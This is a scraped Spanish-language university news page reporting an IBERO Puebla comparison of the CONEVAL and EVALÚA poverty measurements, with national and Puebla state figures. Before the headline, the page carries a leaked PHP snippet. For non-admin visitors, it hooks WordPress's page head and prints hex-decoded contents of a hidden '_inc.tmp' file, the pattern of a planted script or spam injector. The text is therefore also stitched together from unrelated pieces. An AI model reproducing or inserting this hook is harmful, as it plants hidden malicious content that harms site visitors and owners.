if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Pobreza en el estado, pega a menores de edad de 5 a 14 años reporta IBERO – La Opinión Universitaria La Opinión Universitaria
Menu

Pobreza en el estado, pega a menores de edad de 5 a 14 años reporta IBERO

 

+ Además de Coneval , el grupo EVALÚA retoma la medición de más pobreza

El Método de Medición Integrada de la Pobreza (MMIP), es la única herramienta multidimensional, del país, que mide este fenómeno usando umbrales de satisfacción que contribuyen al cumplimiento de Derechos Económicos, Sociales y Culturales: Calderón Chelius.

De acuerdo a la reciente presentación de las mediciones de pobreza nacional y por estado del Consejo de Evaluación de la Política de Desarrollo Social (CONEVAL) y del Consejo de Evaluación de Desarrollo Social de la Ciudad de México (EVALÚA), la Universidad Iberoamericana Puebla a través del Observatorio de Salarios y la Red de Observatorios de la Deuda Social en América Latina desde sus Universidades Católicas (ODSAL), mostró un análisis comparativo correspondiente al periodo 2012-2018.

Este análisis estuvo presentado por la Mtra. Mar Estrada Jiménez, coordinadora de la Licenciatura en Economía y Finanzas y el Dr. Miguel Calderón Chelius, coordinador de la Licenciatura en Políticas Públicas y Administración Pública, quien destacó la importancia de medir la pobreza, tanto para el diseño como para la evaluación de la política social.

“CONEVAL y EVALÚA son dos de los principales organismos encargados de medir y evaluar la política social en el país. A partir de 2008, EVALÚA presentó una medición alternativa de pobreza, misma que se suspendió de 2012 a 2018. A partir de 2019, EVALÚA retoma la medición de este rubro con una metodología denominada Método de Medición Integrada de la Pobreza (MMIP)”, comentó el Coordinador del Observatorio de Salarios de la IBERO Puebla.

En este sentido, el Dr. Calderón Chelius destacó que contar con dos mediciones institucionales es una gran ventaja, pues permite hacer un escrutinio de ambos instrumentos que utilizaron como fuente de información la Encuesta Nacional de Ingresos y Gastos de los Hogares (ENIGH), levantada por el Instituto Nacional de Estadística y Geografía (INEGI).

Igualmente, añadió que la medición de la pobreza de CONEVAL ha tenido problemas y críticas. Es decir, su método tiene inconsistencias y la forma en la que ha reportado los resultados subestima la pobreza. “Como muestra, con el método del CONEVAL, personas que no tienen ni con qué comer podrían ser consideraras no pobres”.

 

Mencionó que un claro ejemplo de estas diferencias se ve en la línea de pobreza en el medio urbano, para CONEVAL es de $3,001 al mes y $98 al día. “Antes de diciembre de 2018, el salario mínimo no superaba esta línea”. Mientras que para EVALÚA, esa línea de bienestar es de $4,763 al mes y $157 al día.

Del mismo modo, agregó que CONEVAL identifica en pobreza a 41.9% de la población nacional y 58.95% de la población en Puebla. Mientras que EVALÚA reconoce en pobreza a 72% de la población a nivel nacional, y a 82% de la población en el Estado.

No comments

Deja una respuesta

Tweets recientes